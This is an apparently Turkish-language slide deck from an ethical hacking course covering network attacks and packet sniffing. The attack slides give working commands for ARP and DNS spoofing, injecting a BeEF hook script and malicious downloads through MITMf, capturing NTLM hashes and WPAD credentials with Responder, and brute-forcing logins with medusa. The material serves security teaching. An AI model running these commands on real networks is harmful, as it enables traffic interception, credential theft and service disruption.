Bu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir. PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.

1. www.prismacsi.com
© All Rights Reserved.
1
Uygulamalı Beyaz
Şapkalı Hacker Eğitimi
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye
https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.

2. www.prismacsi.com
© All Rights Reserved.
2
Ağ Tabanlı Saldırılar

3. www.prismacsi.com
© All Rights Reserved.
3
Konular
• Ağ Tabanlı Saldırılar
• DoS & DDoS Saldırılarına Giriş
• MiTM Saldırıları ve Kullanılan Araçlar
• Arp Spoofing Saldırıları
• DNS Spoofing Saldırıları
• MAC Flooding Saldırıları
• Parola Kırma Saldırıları
• Kullanılan Araçlar

4. www.prismacsi.com
© All Rights Reserved.
4
DoS & DDoS Saldırıları
• DoS (Denial of Service) ve DDoS (Distributed Denial of Service) saldırılarında amaç hedef sunucu,
servis veya uygulamanın servis dışı kalmasını sağlamaktır.
• Bant genişliğine yönelik bir saldırı gerçekleştirilebilir.
• Sunucu kaynakları aşırı kullanarak da bir saldırı simüle edilebilir.
• Uygulama kaynaklarına yönelik bir saldırı gerçekleştirilebilir.
• DoS, tek kaynaktan hedefe doğru trafik üretilir.
• DDoS, birden fazla kaynaktan hedefe doğru trafik üretilir.
• Bir hacking tekniği olarak değerlendirilmez fakat bilgi güvenliğinin 3 temel kriterinden biri olan
erişilebilirliği tehdit ettiği ve büyük etkiler yarattığı için oldukça kritik bir atak tipidir.

5. www.prismacsi.com
© All Rights Reserved.
5
Denial of Service
• Denial of Service
• Servis Dışı Bırakma
• Tek kaynaktan çok sayıda akıllı istek
yapılabilir.
• Uygulama, sunucu veya servis üstündeki
zafiyeti kullanarak direk erişilemez hale
getirilebilir.

6. www.prismacsi.com
© All Rights Reserved.
6
Distributed Denial of Service
• Süreç bir botnet kurmak ile başlıyor.
• Önce bir veya birden fazla zafiyeti kullanarak büyük
ağlara, sunuculara, uygulamalara saldırılar
gerçekleştiriliyor.
• Ele geçirilen sunuculara C2 bağlantı araçları yükleniyor.
• Zombi bilgisayarlar artık kontrol altında.
• Elinizin altında bir ordu var!
• Bir botnet servisini kiralayabilirsiniz veya satın
alabilirsiniz.
• Bot ve Botnet kavramları

7. www.prismacsi.com
© All Rights Reserved.
7
DDoS Servisi Kiralama
*Source: https://www.csoonline.com/article/3180246/data-protection/hire-a-ddos-service-to-take-down-your-enemies.html

8. www.prismacsi.com
© All Rights Reserved.
8
Neyden Korkuyoruz?
• Botnetlere erişim oldukça kolay
• Bir siber saldırı, hacker ne zaman isterse gelebilir
• Kurumsal taraftan bakarsak:
• Maddi kayıplar yaşanabilir
• Erişilebilirlik problemleri
• Prestij
• Maddi kayıp
• Daha fazla maddi kayıp
• Hepimizin maddi kaybı J

9. www.prismacsi.com
© All Rights Reserved.
9
Distributed Denial of Service
• Botnetleri nasıl oluşturuyorlar? Zombie bilgisayarları nasıl ele geçiriyorlar?
• Örnek olarak
• MS17-010 zafiyeti
• Wordpress, Drupal, Joomla gibi uygulamalarda keşfedilen zafiyetler
• Router, switch gibi cihazlarda keşfedilen zafiyetler
• Parola kırma saldırıları, basit parola kullanımı

10. www.prismacsi.com
© All Rights Reserved.
10
DDoS Saldırı Çeşitleri
• Volumetric DDoS Saldırıları
• Hedef bant genişliğini tüketmek
• Böylece iletişim engellenecek
• Dikkat edin kendi bant genişliğinizi tüketmeyin J
• Atak tipleri:
• ICMP Flood
• UDP Flood
• Smurf DoS

11. www.prismacsi.com
© All Rights Reserved.
11
DDoS Saldırı Çeşitleri
• Protokol Tabanlı DDoS Saldırıları
• Hedefin paket birleştirme yapmasını engellemek
• Paketleri parçala ve binlerce , milyonlarca gönder!
• Atak tipleri:
• SYN Flood
• Combo SYN Flood

12. www.prismacsi.com
© All Rights Reserved.
12
DDoS Saldırı Çeşitleri
• Uygulama Katmanında Gerçekleştirilen DDoS Saldırıları
• Hedef uygulama ve uygulamanın çalıştığı sunucunun kaynaklarını tüketmek
• Böylece servisin çalışması engellenecek
• Kredi çekme uygulaması hatırlatması!
• Atak türleri:
• HTTP(s) GET/POST
• Slowloris

13. www.prismacsi.com
© All Rights Reserved.
13
Örnek Saldırı: ICMP Flood
• Tür olarak volumetric DDoS saldırılarına
girmekte
• Amaç bant genişliğini doldurarak erişimi
engellemek
• İçerisinde kullandığı protokol ICMP
protokolüdür.

14. www.prismacsi.com
© All Rights Reserved.
14
Örnek Saldırı: UDP Flood
• Stateless çalışması bizim için bir avantaj
olacak.
• Random portlara durmadan paket
gönderiliyor.
• Sunucu tarafında yapılan kontroller bir
yerden sonra erişimi engelliyor.
• IP Spoofing yapılabilir.
• Amplification saldırıları için maden!

15. www.prismacsi.com
© All Rights Reserved.
15
Amplification Saldırıları
• IP Spoofing yapılabilir.
• Basit bir istek yaklaşık 80 kata kadar
büyütülerek hedef sunucuya iletilebilir.
• Bu elinizdeki 1 gb bandwith ile 80gb
saldırı yapabileceğiniz anlamına
gelmektedir.
• DNS Amplification
• Memcached Amplification
• Github amplification saldırılarından
nasibini alan ilk hedef oldu. Yaklaşık 650
gigabit lik bir saldırı gerçekleştirildi.

16. www.prismacsi.com
© All Rights Reserved.
16
Örnek Saldırı: SYN Flood
• TCP flagleri içerisindeki SYN flagi
kullanılarak gerçekleştirilir.
• Çok sayıda gönderimi sonrası hedef
sisteme erişim engellenebilir.
• SYN paketi gönderildi.
• Cevap olarak SYN+ACK geldi.
• ACK paketi geri gönderilmedi.
• Fakat sunucu hala ACK paketinin
gelmesini bekliyor.

17. www.prismacsi.com
© All Rights Reserved.
17
Örnek Saldırı: HTTP(s) GET/POST DDoS
• Saldırı uygulama katmanında gerçekleşmektedir.
• Apache / IIS sunucularında çalışan uygulamalara
GET ve/veya POST isteği ile yapılan aşırı istek
sunucuyu çaresiz bırakabilir.
• Yakalanması çok daha zordur çünkü loglar analiz
edildiğinde gerçekleştirilen isteğin normal bir istek
olduğu görülecektir.
• Doğal DDoS – Sınav sonuçlarının açıklanması ve
çöküş
• IMDB: 8.2 Tür: Dram

18. www.prismacsi.com
© All Rights Reserved.
18
Örnek Saldırı: Slowloris
• Saldırı uygulama kaynağında gerçekleştirilmektedir.
• Slowhttp
• Tespiti diğer saldırı tiplerine göre daha zor.
• Örneğin HTTP isteğini başlattınız.
• Bir sonraki paketi daha yavaş ve içerik
tamamlanmayacak şekilde gönderiyorsunuz.
• Bir türlü HTTP paketi tamamlanmıyor. Bir sonraki, bir
sonraki….
• Sunucu? Down J

19. www.prismacsi.com
© All Rights Reserved.
19
Örnek Saldırı: Exploit ile DoS Saldırısı
• Öncelikle hedef sunucuda bir analiz gerçekleştirilmeli
ve zafiyetler keşfedilmelidir.
• Zafiyet sadece sunucu veya serviste olmayabilir.
Bunların üstünde çalışan bir uygulamada da olabilir.
• Exploit! Down.
• MS12-020 zafiyeti ile bir sunucunun crash edilmesi.
• Mavi ekrandan sonra sunucu yeniden
başlayacaktır.
• Bu şekilde her 10 sn de bir exploiti çalıştırsanız,
sunucu ayağa kalkamayacak.
• Patch!

20. www.prismacsi.com
© All Rights Reserved.
20
ARP Protokolü Nedir?
• ARP, LAN içerisindeki iletişimi sağlamaktadır.
• IP adresi – MAC (Fiziksel adres) eşleştirmesini sağlamaktadır.
• DNS mantığı ile çalışır.

21. www.prismacsi.com
© All Rights Reserved.
21
ARP Spoofing Saldırıları
• Arp zehirlemesi olarak da adlandırılmaktadır.
• Saldırganlar ağ cihazları ile bilgisayarlar arasına girerek trafiği manipüle etme imkanına
sahip olmaktadır.
• Saldırıların başarılı bir şekilde gerçekleştirilebilmesi için IP Forwarding özelliğinin
aktifleştirilmesi gerekmektedir.
• echo 1 > /proc/sys/net/ipv4/ip_forward

22. www.prismacsi.com
© All Rights Reserved.
22
Man in The Middle – MiTM Saldırıları
• Yerel ağda hackerın hedefi bir şekilde kurbanın trafiğini ele geçirmek veya manipule
etmek olacaktır.
• Bunu yapabileceği en iyi saldırı tiplerinden birisi de MiTM saldırılarıdır.
• Layer 2 de gerçekleştiği için aynı ağa girmesi gerekmekte.
• Show başlasın…
• Imdb: 9.5 Tür: Vahşet

23. www.prismacsi.com
© All Rights Reserved.
23
Man in The Middle – MiTM Saldırıları

24. www.prismacsi.com
© All Rights Reserved.
24
MiTM Saldırılarına Giriş
• ARP Spoof için ilk adım:
• arpspoof –i eth0 –t 10.0.1.5 10.0.1.1
• Ağı zehirlemeye başlayacaktır.
• Urlsnarf ile trafiğin dinlenmesi sağlanabilir
• urlsnarf -i eth0

25. www.prismacsi.com
© All Rights Reserved.
25
MiTM – Ettercap
• MiTM atakları için kullanılan ve kali içerisinde direk gelen bir araç. Yeni çıkan araçlardan sonra eski
popülerliğini kaybetmiş durumda.
• Gerçekleştirilebilecek ataklar:
• Arp Poisoning saldırıları
• DNS Poisoning saldırıları
• DoS saldırıları

26. www.prismacsi.com
© All Rights Reserved.
26
MiTM Framework
• Oldukça yetenekli ve gönülleri fetheden modüllere sahip açık kaynak yazılım
• Python programlama dili ile geliştirilmiş ve platform bağımsız çalışmakta.
• MiTM atakları ile kombine edilebilecek birçok atağı simüle edebilirsiniz.
• JS-inject ile yapılan isteklere javascript enjeksiyonu
• Beef ile birlikte kullanılıyor
• Browser hak!
• File Pwn ile indirilen dosyalara zararlı yerleştirme
• Direk meterpreter shell alabilirsiniz.

27. www.prismacsi.com
© All Rights Reserved.
27
MiTM Framework - Uygulama
• python mitmf.py -i eth0 --spoof --arp --gateway 10.0.1.1
• Tüm subnete MiTM saldırısı gerçekleştirilebilir.
• python mitmf.py -i enp3s0 --inject --js-url http://beefserver:3000/hook.js
• Beef ile browser ele geçirmek için zararlı javascript dosyası inject edilebilir.
• python mitmf.py -i enp3s0 --spoof --dns --arp --target 10.0.1.0/24 --gateway 10.0.1.1
• Config dosyasında var olan ayarlar ile birlikte DNS spoof saldırısı gerçekleştirilebilir.
• python mitmf.py --spoof --arp -i wlan0 --gateway 10.0.1.1 --target 10.0.1.5 –filepwn
• Kurban bir dosya indirirse sistemi üzerinde direk bir shell açılabilir.

28. www.prismacsi.com
© All Rights Reserved.
28
Bettercap
• Bettercap ‘de yine ettercap ten esinlenen ve içeriğini gelişmiş
atakları simüle edebilecek şekilde geliştiren bir araç.
• Oldukça başarılı bir şekilde çalışıyor.
• MiTM saldırıları simüle edilebiliyor.
• Mobil cihazlara yönelik de saldırı tiplerini içinde barındırıyor.

29. www.prismacsi.com
© All Rights Reserved.
29
Cain&Able
• Windows üzerinde çalışıyor ve yine MiTM ataklarını simüle etmek amacıyla
kullanılıyor.
• Eskide kaldı fakat hala daha oldukça başarılı bir şekilde çalışıyor.
• İçinde birçok farklı özellik de mevcut
• Gerçekleştirilebilecek ataklar:
• Arp Spoofing saldırıları
• DNS Spoofing saldırıları
• Parola Kırma saldırıları

30. www.prismacsi.com
© All Rights Reserved.
30
MiTM için Alınabilecek Önlemler
• Arp spoof saldırılarını engelleyen gelişmiş switch veya routerlar kullanılabilir.
• Statik ARP tabloları ile birlikte olası arp tablosunu zehirleyecek saldırıların önüne geçilebilir.
• Statik kayıtlar en etkili çözümdür fakat büyük yapıdaki kurumlar için iyi bir çözüm olmayacağı kesin.
• Arp spoofing saldırılarını algılayan yazılımsal çözümler de kullanılabilir.

31. www.prismacsi.com
© All Rights Reserved.
31
LLMNR – NETBIOS Atakları
• Sistemler DNS çözümlemesi yapamadığında bir LLMNR isteği oluşturur ve tüm broadcaste yayın
yapar.
• LLMNR ‘ın da altyapısı DNS’e dayanmaktadır.
• 224.0.0.252 , TCP/UDP 5335 portu
• NETBIOS-NS (Name Service) – İsim çözme amaçlı kullanılıyor.
• Bir PC ismi düşünün : PRISMA-DC
• Buna bir bağlantı yapmaya çalıştığımızı düşünelim : PRISMA-DV
• Bir harfi hatalı yazdık şimdi ne olacak?

32. www.prismacsi.com
© All Rights Reserved.
32
LLMNR – NETBIOS Atakları
• Responder - LLMNR/NETBIOS Poisoner
• https://github.com/SpiderLabs/Responder
• responder –i eth0
• Hatalı istek geldi ve responder cevabı verdi.
• Kullanıcı adı ve hash bilgisi gönderildi.
• NTLMv2 Hashi ele geçirebilirsiniz.
• Hashi kır ve kullan!
• python mitmf.py -i eth0 --responder --wredir --nbtns

33. www.prismacsi.com
© All Rights Reserved.
33
LLMNR – NETBIOS Atakları
• Responder - LLMNR/NETBIOS Poisoner
• WPAD Saldırısı
• WPAD = Web Proxy Auto-Discover Protocol
• İnternete erişim için bir proxye ihtiyacınız var ve bunu DHCP vs ile otomatize
dağıtmak istiyorsunuz. = WPAD
• İstemci WPAD verileri için DHCP’ye erişemediğinde LLMNR sorgusu yapacaktır.
• Bu noktada yine responder ile devreye girilebilir.

34. www.prismacsi.com
© All Rights Reserved.
34
LLMNR – NETBIOS Atakları
• Responder - LLMNR/NETBIOS Poisoner
• responder –i eth0 –wFb
• WPAD isteği geldi.
• Responder isteği karşıladı ve cevabı döndürdü.
• Proxy tanımlaması için yetki gerekli. İstemci kullanıcı adı ve parolayı iletti.
• Açık metin veriler elde edildi!
• python mitmf.py -i eth0--spoof --arp --gateway 10.0.1.1 --responder –wpad

35. www.prismacsi.com
© All Rights Reserved.
35
IP Spoofing
• Kaynak IP yi değiştirerek gerçekleştirilen siber saldırı tekniği
• IP sahteciliği olarak da adlandırılmaktadır.
• İsteği gönderdik, ya gelen cevap ne olacak?
• Bu yüzden daha çok DoS/DDoS saldırılarında kullanılıyor.
• Hping –a spoofedip -p 80 –S hedefip

36. www.prismacsi.com
© All Rights Reserved.
36
Domain Name System - DNS nedir?

37. www.prismacsi.com
© All Rights Reserved.
37
DNS Spoofing Saldırıları
• DNS zehirlemesi saldırısı.
• Hocam Facebook hesaplarını nasıl ele geçirebilirim? J
• DNS isteklerini yakala ve sahte IP adresleri ile çözümlemelerini yap.
• python mitmf.py --spoof --arp --iface eth0 --gateway IP --target IP --dns --domain
facebook.com --dnsip IP

38. www.prismacsi.com
© All Rights Reserved.
38
MAC Flooding
• Ağ cihazlarını hedef aldınız ve çalışmalarını engellemek istiyorsunuz.
• ARP tablolarını doldursak?
• ARP tablosu dolarsa cihazlar hub’a dönüşecektir.
• Bu da tüm trafiği networke yayacağı anlamına gelir.

39. www.prismacsi.com
© All Rights Reserved.
39
MAC Flooding - DEMO
• Macof aracı ile arp tablosu doldurma
• macof –i eth0 –d 192.168.1.1

40. www.prismacsi.com
© All Rights Reserved.
40
DHCP Starvation
• DHCP içerisinde bir IP havuzu mevcut ve her yeni gelen istemciye buradan bir IP kiralaması
yapıyor.
• İstemci geldi, IP konfigürasyonunu istedi, aldı ve erişimlerini sağladı.
• Peki biz birden fazla konfigürasyon istersek?
• DoS – Denial of Service
• Sahte DHCP Server ayaklandır ve tüm trafik senin üstünden geçsin J

41. www.prismacsi.com
© All Rights Reserved.
41
DHCP Spoof
• Starvation ile DHCP servisini devre dışı bıraktık.
• Sahte bir DHCP servisi yaratarak gelen istekleri karşılayabiliriz.
• Böylece onlara sahte gateway veya dns adresi verebilir ve trafiklerini üstümüzden
geçirebiliriz.
• python mitmf.py -i eth0 --spoof --dhcp

42. www.prismacsi.com
© All Rights Reserved.
42
Parola Kırma Saldırıları
• Ağda birçok saldırıyı denedik.
• Birde parola kırma saldırılarını test etmek gerekiyor.
• Aktif tarama sırasında birçok port keşfettik ve bunların üstünde çalışan servislerin analizini
gerçekleştirdik.
• Örneğin aşağıdaki servislerde basit bir kullanıcı adı ve parola ikilisi yakalansa?
• SSH
• FTP
• SMB
• TELNET
• HTTP

43. www.prismacsi.com
© All Rights Reserved.
43
Parola Kırma Saldırıları
• Parola kırma saldırılarında en sevdiğimiz araç : medusa J
• medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M http
• medusa -h 10.0.1.5 –U userlistesi.txt –p “secretpass” -M smbnt
• medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M ftp
• medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M telnet
• Medusa aşağıdaki tüm servisleri desteklemektedir.
• AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere,
POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP,
SSHv2, Subversion (SVN), Telnet, VNC

44. www.prismacsi.com
© All Rights Reserved.
44
Sniffing & Paket Analizi
• Tshark ile başlayalım.
• Açık kaynak kodlu güçlü bir paket analiz programıdır.
• Komut satırından kullanılır. (Wireshark’ın komut satırından kullanılan hali gibi düşünülebilir.)
• GUI olmamasının dezavantajı birden fazla network sniffinde komut satırından kullanışlı olmayışıdır.
• Uzaktan bağlantılar için uygun

45. www.prismacsi.com
© All Rights Reserved.
45
TShark Kullanımı
• Interfaceleri listelemek için;
• tshark -D

46. www.prismacsi.com
© All Rights Reserved.
46
TShark Kullanımı
• Parametresiz kullanımda, aktif olan interface’i kullanarak dinleme yapar.

47. www.prismacsi.com
© All Rights Reserved.
47
TShark Kullanımı
• Arabirim belirterek dinlemek için -i parametresi kullanılır.
• tshark -i eth0

48. www.prismacsi.com
© All Rights Reserved.
48
TShark Kullanımı
• Yakalanan paketleri kaydetmek için -w, okumak içinde -r parametresi kullanılır;
• tshark -w prisma.pcap
• Kaydedilen paketler libpcap framework destekli bir analiz programı ile okunabilir. (Wireshark)
• Pcap şeklinde dosyasına kaydetmek yerine text haldede kaydedebiliriz. Bunun için;
• tshark > prisma.txt

49. www.prismacsi.com
© All Rights Reserved.
49
TShark Kullanımı
• Paket sayısını kısıtlamak için -c parametresi kullanılır.
• tshark -c 500
• Paket yakalarken filtreleme yapmak için -f parametresi kullanılır. “tcp” “udp” “icmp” “dns” ...
• tshark -f “tcp”

50. www.prismacsi.com
© All Rights Reserved.
50
TShark Kullanımı
• Filtreleme yapmak için;
• tshark -f <>

51. www.prismacsi.com
© All Rights Reserved.
51
TShark Kullanımı
• Filtreleme yapmak için;
• tshark -Y <>

52. www.prismacsi.com
© All Rights Reserved.
52
TShark Kullanımı
• -T parametresi ps, pdml, psml, fields, text parametreleri ile kullanılır.
• ps tek satırlık özet bilgiler verir
• psml XML formatında çıktı üretir.

53. www.prismacsi.com
© All Rights Reserved.
53
TShark Kullanımı
• -f ve -Y parametreleri ile birlikte filtreleme yapmak;
• 192.168.5.5 IP adresine giden veya gelen tüm paketlerin hedefinin IP adresini gösterin.
• tshark -f "host 192.168.5.5" -Y "ip.dst"

54. www.prismacsi.com
© All Rights Reserved.
54
TShark Kullanımı
• HTTP isteklerini dinlemek için;
• tshark -Y http.request -T fields -e http.host -e http.user_agent
• -T parametresi alan adlarını ayıklamak istediğimizi ve -e ile de görmeyi istediğimiz yeri seçiyoruz.

55. www.prismacsi.com
© All Rights Reserved.
55
TShark Kullanımı
• Belirli bir port üzeriden akan trafiği izlemek için;
• tshark -r prismacsi.pcap -R “tcp.port==443”
• 443 dışında ki paketleri izlemek istersek;
• tshark -r prismacsi.pcap -R “!(tcp.port=443)”
• -R parametresi paket yakalama işlemi bittikten dosya pcap dosyasını okurken filtreleme yapmaya
yarar.

56. www.prismacsi.com
© All Rights Reserved.
56
Tcpdump
• Linux tabanlı sistemlerde TCP/IP paketlerini yakalamak ve analiz etmek için kullanılan bir araçtır.
• İlk olarak 1987’de yılında Lawrence Berkeley Laboratuvarında geliştirildi.
• Komut satırı kullanıyor.
• Yakaladığı paketleri pcap şeklinde kaydedebildiği için libpcap kütüphanesi kullanan sniffing araçları
tarafından okunabilir.

57. www.prismacsi.com
© All Rights Reserved.
57
Promiscious Mod
• Aynı subnetteki tüm paketlerin hedef fark etmeksizin bir kopyasını kendi üzerine alması olayıdır.
Paket yakalarken promiscious mod sniffing araçları tarafından otomatik olarak başlatılır. Sniffer
durduğunda ise kapatır.
• Fiziksel makine üzerinde sanal işletim sistemlerinizin trafiğini görmek mümkündür. Ama iki
sanal makine birbirlerinin trafiğini Promiscious Modu aktif ederek görebilir.
• Tcpdump promiscious modu aktif ettiği için “root” yetkisi ile çalışmanız gerekiyor. Ya da suid biti
verilmesi gerekiyor.

58. www.prismacsi.com
© All Rights Reserved.
58
Tcpdump
• Tcpdump’ı root olmadan çalıştırabilmek için CAP_NET_ADMIN ve CAP_NET_RAW özelliklerini
kullanarak mümkün.
• sudo groupadd pcap
• sudo usermod -a -G pcap $USER
• sudo chgrp pcap /usr/sbin/tcpdump
• sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
• sudo ln -s /usr/sbin/tcpdump /usr/bin/tcpdump

59. www.prismacsi.com
© All Rights Reserved.
59
Tcpdump Kullanımı
• Tüm arayüzleri dinlemeye başlamak için;
• tcpdump

60. www.prismacsi.com
© All Rights Reserved.
60
Tcpdump Kullanımı
• Network Interface’leri listelemek için;
• tcpdump -D

61. www.prismacsi.com
© All Rights Reserved.
61
Tcpdump Kullanımı
• Yalnız belirli bir Interface üzerinden paket yakalamak için -i parametresi kullanılır.
• tcpdump -i eth0

62. www.prismacsi.com
© All Rights Reserved.
62
Tcpdump Kullanımı
• Zaman damgası;
• 22:37:02
• Yön Belirteci
• >
• SYN Bayrağı
• S TCP
• TCP başlangıç seri numarası (ISN)
• 2354677536
• Paketin parçalanmama özelliğinin bulunduğu
• DF

63. www.prismacsi.com
© All Rights Reserved.
63
Tcpdump Kullanımı
• Tcpdump başlatılığında durdurulana kadar çalışmaya devam edecektir. -c parametresi ile
yakalanacak paket sayısı sınırlandırılabilir.
• tcpdump -c 10

64. www.prismacsi.com
© All Rights Reserved.
64
Tcpdump Kullanımı
• ASCII formatında çıktı almak için -A parametresi kullanılır.
• tcpdump -A -i eth0

65. www.prismacsi.com
© All Rights Reserved.
65
Tcpdump Kullanımı
• HEX ve ASCII formatında çıktı alabilmek için;
• tcpdump -XX -i enp0s20u1c4i2
• Ağı dinlerken pcap şeklinde kaydetmek için ;
• tcpdump -w 0001.pcap -i enp0s20u1c4i2
• pcap dosyalarını okumak için;
• tcpdump -r 0001.pcap

66. www.prismacsi.com
© All Rights Reserved.
66
Tcpdump Kullanımı
• Yalnızca tcp paketlerini yakalamak için
• tcpdump -i enp0s20u1c4i2 tcp
• Belirli bir portu dinlemek için
• tcpdump -i enp0s20u1c4i2 port 22
• DNS çözümlemesi yapmadan tarama yapmak için (hızlı)
• tcpdump -n -i enp0s20u1c4i2

67. www.prismacsi.com
© All Rights Reserved.
67
Tcpdump Kullanımı
• Kaynak IP verilerek dinleme yapmak için;
• tcpdump -i enp0s20u1c4i2 src 192.168.1.1
• Hedef IP verilerek dinleme yapmak için;
• tcpdump -i enp0s20u1c4i2 dst 192.168.1.2
• Örneğin kaynak IP’si 192.168.1.1 olan hedefi 192.168.1.2 olan paketleri izlemek için;
• tcp dump src 192.168.1.1 and dst host 192.168.1.2

68. www.prismacsi.com
© All Rights Reserved.
68
Tcpdump Kullanımı
• Belirli bir hosta ait paketlerin izlenmesi için
• tcpdump host 192.168.1.1
• Detaylı Loglama yapmak için -v parametresi kullanılır
• tcp dump -v -i enp0s20u1c4i2
• Port çözümlemesi yapmamak için ; ( ssh yerine 22 yazması)
• tcpdump -nn -i enp0s20u1c4i2

69. www.prismacsi.com
© All Rights Reserved.
69
Tcpdump Kullanımı
• Promisc Modu kapatarak Sniff yapmak için -p parametresi kullanılarak kapatılır. Pm modu
kapatılarak sadece o arabirimden gelen ve o arabirimi ilgilendiren paketler izlenir. Tcpdump’ın
çalıştığı makineye ait bir paket analizi yapmak istediğimiz zaman kullanılabilecek türden bir
parametredir.
• tcpdump -p -i enp0s20u1c4i2

70. www.prismacsi.com
© All Rights Reserved.
70
Tcpdump Kullanımı
• HTTP isteklerini listeleme
• tcpdump -w prsm.pcap -nn -A -l -i eth0 | grep "User-Agent:"

71. www.prismacsi.com
© All Rights Reserved.
71
Tcpdump Kullanımı
• DNS istek ve cevapları yakalamak
• sudo tcpdump -i eth0 -s0 port 53

72. www.prismacsi.com
© All Rights Reserved.
72
Tcpdump Kullanımı
• ICMP paketleri yakalama
• sudo tcpdump -i enp0s20u1c4i2 -n icmp

73. www.prismacsi.com
© All Rights Reserved.
73
Wireshark
Bir çok işletim sistemi tarafından çalıştırılabilen, kullanışlı ve kullanıcı dostu arayüz sunan, paket
yakalamak ve analiz etmek için kullanılan bir programdır.

74. www.prismacsi.com
© All Rights Reserved.
74
Wireshark
Wireshark’da paket yakalamaya öncelikle interface seçimi ile başlarız. Açılan sayfada kullanılabilir
interface’leri bize listeler;

75. www.prismacsi.com
© All Rights Reserved.
75
Wireshark

76. www.prismacsi.com
© All Rights Reserved.
76
Wireshark
• Filtreleme yapacağımız bölüm;
• Paketlerin listelendiği bölüm;

77. www.prismacsi.com
© All Rights Reserved.
77
Wireshark
• Seçilen paketle ilgili bilgi aldığımız bölüm;

78. www.prismacsi.com
© All Rights Reserved.
78
Wireshark
• Seçilen paket hex dump halini görebileceğimiz bölüm;
• Hex;
• Verilerin 16lık tabanda tutulduğu halidir. Bir verinin hex hali incelenerek debugging yapılır.

79. www.prismacsi.com
© All Rights Reserved.
79
Wireshark
• Yakaladığımız paketler hakkında genel bilgilerinin bulunduğu bölüm;
• Wireshark kurulumu yapmadan deneme yapmak için https://www.cloudshark.org adresinde online
olarak mevcut trafikerle paket analiz testleri yapabilirsiniz.

80. www.prismacsi.com
© All Rights Reserved.
80
Wireshark Filtrelemeler
• Filtrelemeler üç şekilde yapılır
• Display Filter: Wireshark filtreleri
• Hex Value: Hex değerleri
• String: Metin tabanlı arama

81. www.prismacsi.com
© All Rights Reserved.
81
Display Filter
• DHCP için bazı filtreler
• bootp.option.dhcp == 1 (DISCOVERY packets)
• bootp.option.dhcp == 2 (OFFER packets)
• bootp.option.dhcp == 3 (REQUEST Packets)
• bootp.option.dhcp == 4 (ACK Packets)
• bootp
• bootp.option.hostname
• port 67 or port 68

82. www.prismacsi.com
© All Rights Reserved.
82
Display Filter
• DHCP Discover
Ağda bir DHCP sunucu var mı diye broadcast paket gönderilir.
• DHCP Offer
Client tarafından gönderilen discovery paketi, DHCP sunucusu (birden fazla DHCP sunucusu var ise ilk
offer paketini gönderen dikkate alınır) tarafından alınır. Client için IP adresi ve kira süresi belirlenir.
Onaylanmak üzere clienta gider.

83. www.prismacsi.com
© All Rights Reserved.
83
Display Filter
• DHCP Request
Offer mesajını onaylayan client, DHCP’ye IP adresi almak için istekte bulunur.
• DHCP Acknowledgement
DHCP sunucusu işlemin tamamlandığına dair mesaj gönderir ve client IP adresini alır.

84. www.prismacsi.com
© All Rights Reserved.
84
Display Filter
• DHCP paketlerini analiz edebilmek için
• bootp.option.type == 53

85. www.prismacsi.com
© All Rights Reserved.
85
Display Filter
• ARP için bazı filtreler
• arp
• arp.opcode == 1
• arp.opcode == 2
• arp.src.hw_mac == “Kaynak mac adresi”
• arp.dst.hw_mac == “Hedef mac adresi”
• arp.duplicate-address-frame

86. www.prismacsi.com
© All Rights Reserved.
86
Display Filter
• ARP protokolü nasıl çalışır?

87. www.prismacsi.com
© All Rights Reserved.
87
Display Filter

88. www.prismacsi.com
© All Rights Reserved.
88
Display Filter
• HTTP için bazı filtreler
• http.request.method==POST
• http.request.method==GET
• http.user_agent == “User_Agent”
• http.response.code == 200
• http
• http.referer

89. www.prismacsi.com
© All Rights Reserved.
89
Display Filter

90. www.prismacsi.com
© All Rights Reserved.
90
Display Filter

91. www.prismacsi.com
© All Rights Reserved.
91
Display Filter

92. www.prismacsi.com
© All Rights Reserved.
92
Display Filter
• DNS için bazı filtreler
• dns
• dns.qry.name == "prismacsi.com”
• dns.qry.type == 1 (A Record Type)dns.qry.type == 255 (ANY Record Type)
• dns.qry.type == 2 (NS name server)dns.qry.type == 15(MX mail exchange

93. www.prismacsi.com
© All Rights Reserved.
93
Display Filter

94. www.prismacsi.com
© All Rights Reserved.
94
Display Filter

95. www.prismacsi.com
© All Rights Reserved.
95
Display Filter

96. www.prismacsi.com
© All Rights Reserved.
96
Display Filter
• IP için bazı filtreler
• ip.addr
• ip.ttl
• ip.src == 127.0.0.1
• ip.dst == 127.0.0.2
• ip.version == 4

97. www.prismacsi.com
© All Rights Reserved.
97
Display Filter

98. www.prismacsi.com
© All Rights Reserved.
98
Display Filter

99. www.prismacsi.com
© All Rights Reserved.
99
Display Filter
• TCP için bazı filtreler
• tcp.flags.syn == 1
• tcp.srcport == 80
• tcp.port == 80
• tcp.dstport == 443

100. www.prismacsi.com
© All Rights Reserved.
10
0
Display Filter

101. www.prismacsi.com
© All Rights Reserved.
10
1
Display Filter

102. www.prismacsi.com
© All Rights Reserved.
10
2
Display Filter

103. www.prismacsi.com
© All Rights Reserved.
10
3
Display Filter

104. www.prismacsi.com
© All Rights Reserved.
10
4
Display Filter
• ICMP için bazı filtreler
• icmp.type
• icmp.code

105. www.prismacsi.com
© All Rights Reserved.
10
5
Display Filter

106. www.prismacsi.com
© All Rights Reserved.
10
6
Display Filter

107. www.prismacsi.com
© All Rights Reserved.
10
7
Display Filter
• FTP için bazı filtreler
• ftp.request.command == PASS
• ftp.request.command == USER
• ftp.response.arg == "Login successful."
• ftp.request
• ftp.request.command

108. www.prismacsi.com
© All Rights Reserved.
10
8
Display Filter

109. www.prismacsi.com
© All Rights Reserved.
10
9
Display Filter

110. www.prismacsi.com
© All Rights Reserved.
11
